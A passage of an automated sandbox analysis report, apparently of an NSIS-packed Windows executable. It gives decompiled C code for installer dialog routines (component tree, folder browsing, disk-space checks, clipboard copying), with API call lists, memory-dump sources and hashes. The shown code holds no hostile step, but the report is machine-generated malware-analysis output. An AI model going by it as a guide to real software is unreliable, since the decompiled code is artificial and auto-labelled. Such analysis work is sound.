              						E00403E5C(0x78);
              						goto L20;
              					} else {
              						__eflags = _a12 - 0x403;
              						if(_a12 != 0x403) {
              							L20:
              							return E00403EEA(_a8, _a12, _a16);
              						}
              						ShowWindow( *0x42e3f0, _t149);
              						ShowWindow(_t154, 8);
              						E00403EB8(_t154);
              						goto L17;
              					}
              				}
              				_v52 = _v52 | 0xffffffff;
              				_v40 = _v40 | 0xffffffff;
              				_v60 = 2;
              				_v56 = 0;
              				_v48 = 0;
              				_v44 = 0;
              				asm("stosd");
              				asm("stosd");
              				_t123 =  *0x42ec30; // 0x504d60
              				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
              				_a12 =  *((intOrPtr*)(_t123 + 0x60));
              				 *0x42e3f0 = GetDlgItem(_a4, 0x403);
              				 *0x42e3e8 = GetDlgItem(_a4, 0x3ee);
              				_t127 = GetDlgItem(_a4, 0x3f8);
              				 *0x42e404 = _t127;
              				_v8 = _t127;
              				E00403EB8( *0x42e3f0);
              				 *0x42e3f4 = E00404755(4);
              				 *0x42e40c = 0;
              				GetClientRect(_v8,  &_v28);
              				_v52 = _v28.right - GetSystemMetrics(0x15);
              				SendMessageA(_v8, 0x101b, 0,  &_v60);
              				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
              				if(_a8 >= 0) {
              					SendMessageA(_v8, 0x1001, 0, _a8);
              					SendMessageA(_v8, 0x1026, 0, _a8);
              				}
              				if(_a12 >= _t149) {
              					SendMessageA(_v8, 0x1024, _t149, _a12);
              				}
              				_push( *((intOrPtr*)(_a16 + 0x30)));
              				_push(0x1b);
              				E00403E83(_a4);
              				if(( *0x42ec38 & 0x00000003) != 0) {
              					ShowWindow( *0x42e3f0, _t149);
              					if(( *0x42ec38 & 0x00000002) != 0) {
              						 *0x42e3f0 = _t149;
              					} else {
              						ShowWindow(_v8, 8);
              					}
              					E00403EB8( *0x42e3e8);
              				}
              				_t158 = GetDlgItem(_a4, 0x3ec);
              				SendMessageA(_t158, 0x401, _t149, 0x75300000);
              				if(( *0x42ec38 & 0x00000004) != 0) {
              					SendMessageA(_t158, 0x409, _t149, _a12);
              					SendMessageA(_t158, 0x2001, _t149, _a8);
              				}
              				goto L37;
              			}



































              APIs
              • GetDlgItem.USER32(?,00000403), ref: 00405050
              • GetDlgItem.USER32(?,000003EE), ref: 0040505F
              • GetClientRect.USER32 ref: 0040509C
              • GetSystemMetrics.USER32 ref: 004050A4
              • SendMessageA.USER32 ref: 004050C5
              • SendMessageA.USER32 ref: 004050D6
              • SendMessageA.USER32 ref: 004050E9
              • SendMessageA.USER32 ref: 004050F7
              • SendMessageA.USER32 ref: 0040510A
              • ShowWindow.USER32(00000000,?), ref: 0040512C
              • ShowWindow.USER32(?,00000008), ref: 00405140
              • GetDlgItem.USER32(?,000003EC), ref: 00405161
              • SendMessageA.USER32 ref: 00405171
              • SendMessageA.USER32 ref: 0040518A
              • SendMessageA.USER32 ref: 00405196
              • GetDlgItem.USER32(?,000003F8), ref: 0040506E
                • Part of subcall function 00403EB8: SendMessageA.USER32 ref: 00403EC6
              • GetDlgItem.USER32(?,000003EC), ref: 004051B3
              • CreateThread.KERNEL32(00000000,00000000,Function_00004F85,00000000), ref: 004051C1
              • CloseHandle.KERNEL32(00000000), ref: 004051C8
              • ShowWindow.USER32(00000000), ref: 004051EC
              • ShowWindow.USER32(00000000,00000008), ref: 004051F1
              • ShowWindow.USER32(00000008), ref: 00405238
              • SendMessageA.USER32 ref: 0040526A
              • CreatePopupMenu.USER32 ref: 0040527B
              • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405290
              • GetWindowRect.USER32 ref: 004052A3
              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
              • SendMessageA.USER32 ref: 00405302
              • OpenClipboard.USER32(00000000), ref: 00405312
              • EmptyClipboard.USER32 ref: 00405318
              • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
              • GlobalLock.KERNEL32 ref: 0040532B
              • SendMessageA.USER32 ref: 0040533F
              • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
              • SetClipboardData.USER32 ref: 00405362
              • CloseClipboard.USER32 ref: 00405368
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
              • String ID: `MP${
              • API String ID: 590372296-1827497746
              • Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
              • Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
              • Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
              • Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E00404802(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
              				struct HWND__* _v8;
              				struct HWND__* _v12;
              				signed int _v16;
              				intOrPtr _v20;
              				void* _v24;
              				long _v28;
              				int _v32;
              				signed int _v40;
              				int _v44;
              				signed int* _v56;
              				intOrPtr _v60;
              				signed int _v64;
              				long _v68;
              				void* _v72;
              				intOrPtr _v76;
              				intOrPtr _v80;
              				void* _v84;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				struct HWND__* _t182;
              				intOrPtr _t183;
              				int _t189;
              				int _t196;
              				intOrPtr _t198;
              				long _t202;
              				signed int _t206;
              				signed int _t217;
              				void* _t220;
              				void* _t221;
              				int _t227;
              				intOrPtr _t231;
              				signed int _t232;
              				signed int _t233;
              				signed int _t240;
              				signed int _t242;
              				signed int _t245;
              				signed int _t247;
              				struct HBITMAP__* _t250;
              				void* _t252;
              				char* _t268;
              				signed char _t269;
              				long _t274;
              				int _t280;
              				signed int* _t281;
              				int _t282;
              				long _t283;
              				signed int* _t284;
              				int _t285;
              				long _t286;
              				signed int _t287;
              				long _t288;
              				signed int _t291;
              				int _t294;
              				signed int _t298;
              				signed int _t300;
              				signed int _t302;
              				intOrPtr _t309;
              				int* _t310;
              				void* _t311;
              				int _t315;
              				int _t316;
              				int _t317;
              				signed int _t318;
              				void* _t320;
              				void* _t328;
              				void* _t331;
              
              				_v12 = GetDlgItem(_a4, 0x3f9);
              				_t182 = GetDlgItem(_a4, 0x408);
              				_t280 =  *0x42ec48; // 0x504f0c
              				_t320 = SendMessageA;
              				_v8 = _t182;
              				_t183 =  *0x42ec30; // 0x504d60
              				_t315 = 0;
              				_v32 = _t280;
              				_v20 = _t183 + 0x94;
              				if(_a8 != 0x110) {
              					L23:
              					__eflags = _a8 - 0x405;
              					if(_a8 != 0x405) {
              						_t289 = _a16;
              					} else {
              						_a12 = _t315;
              						_t289 = 1;
              						_a8 = 0x40f;
              						_a16 = 1;
              					}
              					__eflags = _a8 - 0x4e;
              					if(_a8 == 0x4e) {
              						L28:
              						__eflags = _a8 - 0x413;
              						_v16 = _t289;
              						if(_a8 == 0x413) {
              							L30:
              							__eflags =  *0x42ec39 & 0x00000002;
              							if(( *0x42ec39 & 0x00000002) != 0) {
              								L41:
              								__eflags = _v16 - _t315;
              								if(_v16 != _t315) {
              									_t232 = _v16;
              									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
              									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
              										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
              									}
              									_t233 = _v16;
              									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
              									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
              										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
              										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
              											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
              											 *_t284 =  *_t284 & 0xffffffdf;
              											__eflags =  *_t284;
              										} else {
              											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
              										}
              									}
              								}
              								goto L48;
              							}
              							__eflags = _a8 - 0x413;
              							if(_a8 == 0x413) {
              								L33:
              								__eflags = _a8 - 0x413;
              								_t289 = 0 | _a8 != 0x00000413;
              								_t240 = E00404782(_v8, _a8 != 0x413);
              								__eflags = _t240 - _t315;
              								if(_t240 >= _t315) {
              									_t93 = _t280 + 8; // 0x8
              									_t310 = _t240 * 0x418 + _t93;
              									_t289 =  *_t310;
              									__eflags = _t289 & 0x00000010;
              									if((_t289 & 0x00000010) == 0) {
              										__eflags = _t289 & 0x00000040;
              										if((_t289 & 0x00000040) == 0) {
              											_t298 = _t289 ^ 0x00000001;
              											__eflags = _t298;
              										} else {
              											_t300 = _t289 ^ 0x00000080;
              											__eflags = _t300;
              											if(_t300 >= 0) {
              												_t298 = _t300 & 0xfffffffe;
              											} else {
              												_t298 = _t300 | 0x00000001;
              											}
              										}
              										 *_t310 = _t298;
              										E0040117D(_t240);
              										_t242 =  *0x42ec38; // 0x80
              										_t289 = 1;
              										_a8 = 0x40f;
              										_t245 =  !_t242 >> 0x00000008 & 1;
              										__eflags = _t245;
              										_a12 = 1;
              										_a16 = _t245;
              									}
              								}
              								goto L41;
              							}
              							_t289 = _a16;
              							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
              							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
              								goto L41;
              							}
              							goto L33;
              						}
              						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
              						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
              							goto L48;
              						}
              						goto L30;
              					} else {
              						__eflags = _a8 - 0x413;
              						if(_a8 != 0x413) {
              							L48:
              							__eflags = _a8 - 0x111;
              							if(_a8 != 0x111) {
              								L56:
              								__eflags = _a8 - 0x200;
              								if(_a8 == 0x200) {
              									SendMessageA(_v8, 0x200, _t315, _t315);
              								}
              								__eflags = _a8 - 0x40b;
              								if(_a8 == 0x40b) {
              									_t220 =  *0x42a07c;
              									__eflags = _t220 - _t315;
              									if(_t220 != _t315) {
              										ImageList_Destroy(_t220);
              									}
              									_t221 =  *0x42a094;
              									__eflags = _t221 - _t315;
              									if(_t221 != _t315) {
              										GlobalFree(_t221);
              									}
              									 *0x42a07c = _t315;
              									 *0x42a094 = _t315;
              									 *0x42ec80 = _t315;
              								}
              								__eflags = _a8 - 0x40f;
              								if(_a8 != 0x40f) {
              									L86:
              									__eflags = _a8 - 0x420;
              									if(_a8 == 0x420) {
              										__eflags =  *0x42ec39 & 0x00000001;
              										if(( *0x42ec39 & 0x00000001) != 0) {
              											__eflags = _a16 - 0x20;
              											_t189 = (0 | _a16 == 0x00000020) << 3;
              											__eflags = _t189;
              											_t316 = _t189;
              											ShowWindow(_v8, _t316);
              											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
              										}
              									}
              									goto L89;
              								} else {
              									E004011EF(_t289, _t315, _t315);
              									__eflags = _a12 - _t315;
              									if(_a12 != _t315) {
              										E0040140B(8);
              									}
              									__eflags = _a16 - _t315;
              									if(_a16 == _t315) {
              										L73:
              										E004011EF(_t289, _t315, _t315);
              										__eflags =  *0x42ec4c - _t315; // 0x3
              										_v32 =  *0x42a094;
              										_t196 =  *0x42ec48; // 0x504f0c
              										_v60 = 0xf030;
              										_v16 = _t315;
              										if(__eflags <= 0) {
              											L84:
              											InvalidateRect(_v8, _t315, 1);
              											_t198 =  *0x42e3fc; // 0x50be62
              											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
              											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
              												E0040473D(0x3ff, 0xfffffffb, E00404755(5));
              											}
              											goto L86;
              										} else {
              											_t142 = _t196 + 8; // 0x504f14
              											_t281 = _t142;
              											do {
              												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
              												__eflags = _t202 - _t315;
              												if(_t202 != _t315) {
              													_t291 =  *_t281;
              													_v68 = _t202;
              													__eflags = _t291 & 0x00000001;
              													_v72 = 8;
              													if((_t291 & 0x00000001) != 0) {
              														_t151 =  &(_t281[4]); // 0x504f24
              														_v72 = 9;
              														_v56 = _t151;
              														_t154 =  &(_t281[0]);
              														 *_t154 = _t281[0] & 0x000000fe;
              														__eflags =  *_t154;
              													}
              													__eflags = _t291 & 0x00000040;
              													if((_t291 & 0x00000040) == 0) {
              														_t206 = (_t291 & 0x00000001) + 1;
              														__eflags = _t291 & 0x00000010;
              														if((_t291 & 0x00000010) != 0) {
              															_t206 = _t206 + 3;
              															__eflags = _t206;
              														}
              													} else {
              														_t206 = 3;
              													}
              													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
              													__eflags = _t294;
              													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
              													SendMessageA(_v8, 0x1102, _t294, _v68);
              													SendMessageA(_v8, 0x110d, _t315,  &_v72);
              												}
              												_v16 = _v16 + 1;
              												_t281 =  &(_t281[0x106]);
              												__eflags = _v16 -  *0x42ec4c; // 0x3
              											} while (__eflags < 0);
              											goto L84;
              										}
              									} else {
              										_t282 = E004012E2( *0x42a094);
              										E00401299(_t282);
              										_t217 = 0;
              										_t289 = 0;
              										__eflags = _t282 - _t315;
              										if(_t282 <= _t315) {
              											L72:
              											SendMessageA(_v12, 0x14e, _t289, _t315);
              											_a16 = _t282;
              											_a8 = 0x420;
              											goto L73;
              										} else {
              											goto L69;
              										}
              										do {
              											L69:
              											_t309 = _v20;
              											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
              											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
              												_t289 = _t289 + 1;
              												__eflags = _t289;
              											}
              											_t217 = _t217 + 1;
              											__eflags = _t217 - _t282;
              										} while (_t217 < _t282);
              										goto L72;
              									}
              								}
              							}
              							__eflags = _a12 - 0x3f9;
              							if(_a12 != 0x3f9) {
              								goto L89;
              							}
              							__eflags = _a12 >> 0x10 - 1;
              							if(_a12 >> 0x10 != 1) {
              								goto L89;
              							}
              							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
              							__eflags = _t227 - 0xffffffff;
              							if(_t227 == 0xffffffff) {
              								goto L89;
              							}
              							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
              							__eflags = _t283 - 0xffffffff;
              							if(_t283 == 0xffffffff) {
              								L54:
              								_t283 = 0x20;
              								L55:
              								E00401299(_t283);
              								SendMessageA(_a4, 0x420, _t315, _t283);
              								_a12 = 1;
              								_a16 = _t315;
              								_a8 = 0x40f;
              								goto L56;
              							}
              							_t231 = _v20;
              							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
              							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
              								goto L55;
              							}
              							goto L54;
              						}
              						goto L28;
              					}
              				} else {
              					 *0x42ec80 = _a4;
              					_t247 =  *0x42ec4c; // 0x3
              					_t285 = 2;
              					_v28 = 0;
              					_v16 = _t285;
              					 *0x42a094 = GlobalAlloc(0x40, _t247 << 2);
              					_t250 = LoadBitmapA( *0x42ec20, 0x6e);
              					 *0x42a088 =  *0x42a088 | 0xffffffff;
              					_v24 = _t250;
              					 *0x42a090 = SetWindowLongA(_v8, 0xfffffffc, E00404E03);
              					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
              					 *0x42a07c = _t252;
              					ImageList_AddMasked(_t252, _v24, 0xff00ff);
              					SendMessageA(_v8, 0x1109, _t285,  *0x42a07c);
              					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
              						SendMessageA(_v8, 0x111b, 0x10, 0);
              					}
              					DeleteObject(_v24);
              					_t286 = 0;
              					do {
              						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
              						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
              							if(_t286 != 0x20) {
              								_v16 = _t315;
              							}
              							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BE9(_t286, _t315, _t320, _t315, _t258)), _t286);
              						}
              						_t286 = _t286 + 1;
              					} while (_t286 < 0x21);
              					_t317 = _a16;
              					_t287 = _v16;
              					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
              					_push(0x15);
              					E00403E83(_a4);
              					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
              					_push(0x16);
              					E00403E83(_a4);
              					_t318 = 0;
              					_t288 = 0;
              					_t328 =  *0x42ec4c - _t318; // 0x3
              					if(_t328 <= 0) {
              						L19:
              						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
              						goto L20;
              					} else {
              						_t311 = _v32 + 8;
              						_v24 = _t311;
              						do {
              							_t268 = _t311 + 0x10;
              							if( *_t268 != 0) {
              								_v60 = _t268;
              								_t269 =  *_t311;
              								_t302 = 0x20;
              								_v84 = _t288;
              								_v80 = 0xffff0002;
              								_v76 = 0xd;
              								_v64 = _t302;
              								_v40 = _t318;
              								_v68 = _t269 & _t302;
              								if((_t269 & 0x00000002) == 0) {
              									__eflags = _t269 & 0x00000004;
              									if((_t269 & 0x00000004) == 0) {
              										 *( *0x42a094 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
              									} else {
              										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
              									}
              								} else {
              									_v76 = 0x4d;
              									_v44 = 1;
              									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
              									_v28 = 1;
              									 *( *0x42a094 + _t318 * 4) = _t274;
              									_t288 =  *( *0x42a094 + _t318 * 4);
              								}
              							}
              							_t318 = _t318 + 1;
              							_t311 = _v24 + 0x418;
              							_t331 = _t318 -  *0x42ec4c; // 0x3
              							_v24 = _t311;
              						} while (_t331 < 0);
              						if(_v28 != 0) {
              							L20:
              							if(_v16 != 0) {
              								E00403EB8(_v8);
              								_t280 = _v32;
              								_t315 = 0;
              								__eflags = 0;
              								goto L23;
              							} else {
              								ShowWindow(_v12, 5);
              								E00403EB8(_v12);
              								L89:
              								return E00403EEA(_a8, _a12, _a16);
              							}
              						}
              						goto L19;
              					}
              				}
              			}

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
              • String ID: $M$N$`MP
              • API String ID: 1638840714-249421029
              • Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
              • Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
              • Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
              • Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 78%
              			E004042C1(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
              				signed int _v8;
              				signed int _v12;
              				long _v16;
              				long _v20;
              				long _v24;
              				char _v28;
              				intOrPtr _v32;
              				long _v36;
              				char _v40;
              				unsigned int _v44;
              				signed int _v48;
              				CHAR* _v56;
              				intOrPtr _v60;
              				intOrPtr _v64;
              				intOrPtr _v68;
              				CHAR* _v72;
              				void _v76;
              				struct HWND__* _v80;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr _t82;
              				long _t87;
              				signed char* _t89;
              				void* _t95;
              				signed int _t96;
              				int _t109;
              				signed short _t114;
              				signed int _t118;
              				struct HWND__** _t122;
              				intOrPtr _t124;
              				intOrPtr* _t138;
              				CHAR* _t146;
              				intOrPtr _t147;
              				unsigned int _t150;
              				signed int _t152;
              				unsigned int _t156;
              				signed int _t158;
              				signed int* _t159;
              				struct HWND__* _t165;
              				struct HWND__* _t166;
              				int _t168;
              				unsigned int _t197;
              
              				_t156 = __edx;
              				_t82 =  *0x429870;
              				_v32 = _t82;
              				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x42f000;
              				_v12 =  *((intOrPtr*)(_t82 + 0x38));
              				if(_a8 == 0x40b) {
              					E0040546C(0x3fb, _t146);
              					E00405E29(_t146);
              				}
              				_t166 = _a4;
              				if(_a8 != 0x110) {
              					L8:
              					if(_a8 != 0x111) {
              						L20:
              						if(_a8 == 0x40f) {
              							L22:
              							_v8 = _v8 & 0x00000000;
              							_v12 = _v12 & 0x00000000;
              							E0040546C(0x3fb, _t146);
              							if(E0040579B(_t185, _t146) == 0) {
              								_v8 = 1;
              							}
              							E00405BC7(0x429068, _t146);
              							_t87 = E00405F57(1);
              							_v16 = _t87;
              							if(_t87 == 0) {
              								L30:
              								E00405BC7(0x429068, _t146);
              								_t89 = E0040574E(0x429068);
              								_t158 = 0;
              								if(_t89 != 0) {
              									 *_t89 =  *_t89 & 0x00000000;
              								}
              								if(GetDiskFreeSpaceA(0x429068,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
              									goto L35;
              								} else {
              									_t168 = 0x400;
              									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
              									asm("cdq");
              									_v48 = _t109;
              									_v44 = _t156;
              									_v12 = 1;
              									goto L36;
              								}
              							} else {
              								_t159 = 0;
              								if(0 == 0x429068) {
              									goto L30;
              								} else {
              									goto L26;
              								}
              								while(1) {
              									L26:
              									_t114 = _v16(0x429068,  &_v48,  &_v28,  &_v40);
              									if(_t114 != 0) {
              										break;
              									}
              									if(_t159 != 0) {
              										 *_t159 =  *_t159 & _t114;
              									}
              									_t159 = E00405701(0x429068) - 1;
              									 *_t159 = 0x5c;
              									if(_t159 != 0x429068) {
              										continue;
              									} else {
              										goto L30;
              									}
              								}
              								_t150 = _v44;
              								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
              								_v44 = _t150 >> 0xa;
              								_v12 = 1;
              								_t158 = 0;
              								__eflags = 0;
              								L35:
              								_t168 = 0x400;
              								L36:
              								_t95 = E00404755(5);
              								if(_v12 != _t158) {
              									_t197 = _v44;
              									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
              										_v8 = 2;
              									}
              								}
              								_t147 =  *0x42e3fc; // 0x50be62
              								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
              									E0040473D(0x3ff, 0xfffffffb, _t95);
              									if(_v12 == _t158) {
              										SetDlgItemTextA(_a4, _t168, 0x429058);
              									} else {
              										E00404678(_t168, 0xfffffffc, _v48, _v44);
              									}
              								}
              								_t96 = _v8;
              								 *0x42ecc4 = _t96;
              								if(_t96 == _t158) {
              									_v8 = E0040140B(7);
              								}
              								if(( *(_v32 + 0x14) & _t168) != 0) {
              									_v8 = _t158;
              								}
              								E00403EA5(0 | _v8 == _t158);
              								if(_v8 == _t158 &&  *0x42a08c == _t158) {
              									E00404256();
              								}
              								 *0x42a08c = _t158;
              								goto L53;
              							}
              						}
              						_t185 = _a8 - 0x405;
              						if(_a8 != 0x405) {
              							goto L53;
              						}
              						goto L22;
              					}
              					_t118 = _a12 & 0x0000ffff;
              					if(_t118 != 0x3fb) {
              						L12:
              						if(_t118 == 0x3e9) {
              							_t152 = 7;
              							memset( &_v76, 0, _t152 << 2);
              							_v80 = _t166;
              							_v72 = 0x42a0a0;
              							_v60 = E00404612;
              							_v56 = _t146;
              							_v68 = E00405BE9(_t146, 0x42a0a0, _t166, 0x429470, _v12);
              							_t122 =  &_v80;
              							_v64 = 0x41;
              							__imp__SHBrowseForFolderA(_t122);
              							if(_t122 == 0) {
              								_a8 = 0x40f;
              							} else {
              								__imp__CoTaskMemFree(_t122);
              								E004056BA(_t146);
              								_t124 =  *0x42ec30; // 0x504d60
              								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
              								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\Albus\\AppData\\Local\\Temp") {
              									E00405BE9(_t146, 0x42a0a0, _t166, 0, _t125);
              									if(lstrcmpiA(0x42dbc0, 0x42a0a0) != 0) {
              										lstrcatA(_t146, 0x42dbc0);
              									}
              								}
              								 *0x42a08c =  *0x42a08c + 1;
              								SetDlgItemTextA(_t166, 0x3fb, _t146);
              							}
              						}
              						goto L20;
              					}
              					if(_a12 >> 0x10 != 0x300) {
              						goto L53;
              					}
              					_a8 = 0x40f;
              					goto L12;
              				} else {
              					_t165 = GetDlgItem(_t166, 0x3fb);
              					if(E00405727(_t146) != 0 && E0040574E(_t146) == 0) {
              						E004056BA(_t146);
              					}
              					 *0x42e3f8 = _t166;
              					SetWindowTextA(_t165, _t146);
              					_push( *((intOrPtr*)(_a16 + 0x34)));
              					_push(1);
              					E00403E83(_t166);
              					_push( *((intOrPtr*)(_a16 + 0x30)));
              					_push(0x14);
              					E00403E83(_t166);
              					E00403EB8(_t165);
              					_t138 = E00405F57(0xa);
              					if(_t138 == 0) {
              						L53:
              						return E00403EEA(_a8, _a12, _a16);
              					} else {
              						 *_t138(_t165, 1);
              						goto L8;
              					}
              				}
              			}

              APIs
              • GetDlgItem.USER32(?,000003FB), ref: 00404310
              • SetWindowTextA.USER32(00000000,?), ref: 0040433A
              • SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
              • CoTaskMemFree.OLE32(00000000), ref: 004043F6
              • lstrcmpiA.KERNEL32(TclpOwkq,0042A0A0,00000000,?,?), ref: 00404428
              • lstrcatA.KERNEL32(?,TclpOwkq), ref: 00404434
              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404446
                • Part of subcall function 0040546C: GetDlgItemTextA.USER32 ref: 0040547F
                • Part of subcall function 00405E29: CharNextA.USER32(?), ref: 00405E81
                • Part of subcall function 00405E29: CharNextA.USER32(?), ref: 00405E8E
                • Part of subcall function 00405E29: CharNextA.USER32(?), ref: 00405E93
                • Part of subcall function 00405E29: CharPrevA.USER32(?,?), ref: 00405EA3
              • GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
              • MulDiv.KERNEL32 ref: 0040451F
                • Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                • Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
                • Part of subcall function 00404678: SetDlgItemTextA.USER32(?,0042A0A0), ref: 00404731
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
              • String ID: A$C:\Users\user\AppData\Local\Temp$TclpOwkq$`MP
              • API String ID: 2624150263-490765851
              • Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
              • Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
              • Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
              • Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 74%
              			E00402053() {
              				void* _t44;
              				intOrPtr* _t48;
              				intOrPtr* _t50;
              				intOrPtr* _t52;
              				intOrPtr* _t54;
              				signed int _t58;
              				intOrPtr* _t59;
              				intOrPtr* _t62;
              				intOrPtr* _t64;
              				intOrPtr* _t66;
              				intOrPtr* _t69;
              				intOrPtr* _t71;
              				int _t75;
              				signed int _t81;
              				intOrPtr* _t88;
